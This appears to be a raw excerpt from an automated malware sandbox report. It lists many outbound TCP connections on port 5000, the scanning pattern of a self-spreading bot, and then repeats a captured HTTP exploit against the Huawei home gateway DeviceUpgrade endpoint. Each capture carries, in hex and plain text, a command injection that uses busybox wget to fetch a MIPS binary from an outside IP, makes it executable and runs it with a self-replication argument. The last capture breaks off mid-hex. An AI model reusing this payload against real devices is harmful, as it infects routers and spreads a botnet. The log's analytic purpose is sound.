                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.16.163.159:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.26.137.212:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.63.75.217:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.93.214.223:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.116.200.199:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.248.86.121:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.136.205.137:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.76.152.29:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.90.109.104:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.186.169.43:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.255.136.98:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.69.46.45:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.134.68.37:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.202.247.124:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.63.220.104:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.107.33.149:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.167.214.151:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.32.196.18:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.73.23.60:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.200.32.188:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.201.147.57:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.252.231.154:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.183.218.59:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.6.64.246:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.241.193.147:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.151.115.97:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.188.221.203:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.87.194.245:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.206.8.183:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.14.164.58:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.33.115.237:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.2.213.10:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.158.208.229:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.244.158.209:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.48.53.157:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.39.49.194:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.233.253.136:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.244.223.137:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.133.219.103:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.176.63.233:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.43.129.133:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.6.93.177:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.202.216.143:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.127.237.133:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.255.136.8:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.63.12.86:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.223.182.146:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.76.220.216:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.76.74.243:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.7.7.172:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.25.31.142:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.220.110.70:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.24.40.236:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.205.65.39:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.174.61.167:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.194.237.167:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.153.150.94:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.232.114.43:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.229.37.154:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.128.126.95:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.41.148.119:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.239.232.109:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.181.216.185:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.158.67.141:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.240.86.217:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.200.32.181:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.106.99.113:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.208.35.179:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.218.23.159:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.56.67.12:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.230.81.151:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.37.188.170:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.189.104.224:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.58.133.2:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.216.221.135:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.32.114.170:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.222.124.217:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.234.224.27:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.59.203.172:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.50.42.142:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.128.240.116:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.35.170.232:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.28.92.62:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.149.216.242:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.15.34.140:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.242.20.220:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.161.181.212:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.199.42.218:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.81.214.211:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.2.106.72:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.101.107.223:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.220.243.213:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.236.199.106:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.31.43.196:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.146.114.1:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.139.132.250:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.116.143.170:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.223.128.187:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.134.138.101:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.30.33.166:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.112.110.151:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.202.85.48:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.138.3.114:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.68.73.214:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.82.142.70:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.119.6.242:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.6.6.56:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.221.137.197:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.5.18.15:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.35.251.215:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.161.242.139:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.36.180.212:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.56.118.101:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.63.27.48:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.67.249.254:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.119.243.130:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.200.245.57:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.222.226.131:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.127.240.210:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.90.29.197:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.118.216.142:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.66.55.232:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.72.81.20:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.226.41.144:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.248.158.227:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.113.152.8:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.16.212.6:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.171.11.64:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.69.189.2:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.158.11.4:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.229.165.137:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.151.125.218:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.106.64.228:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.30.128.116:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.140.37.109:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.202.34.91:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.229.109.115:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.135.181.159:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.126.145.204:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.241.193.124:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.191.117.70:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.101.40.64:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.200.193.175:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.194.47.51:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.230.162.102:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.183.128.222:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.182.27.90:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.126.216.86:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.34.100.224:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.198.122.197:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.216.183.169:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.203.62.241:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.23.151.157:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.5.180.152:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.138.27.101:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.80.3.178:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.63.202.103:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.97.232.47:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.13.216.33:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.77.124.174:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.186.223.64:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.37.54.97:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.99.231.68:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.165.206.27:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.224.72.32:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.84.175.52:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.177.184.230:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.223.229.202:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.214.153.31:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.68.17.0:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.128.96.150:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.44.72.226:5000
                  Source: global trafficTCP traffic: 192.168.2.14:48611 -> 211.115.208.133:5000
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 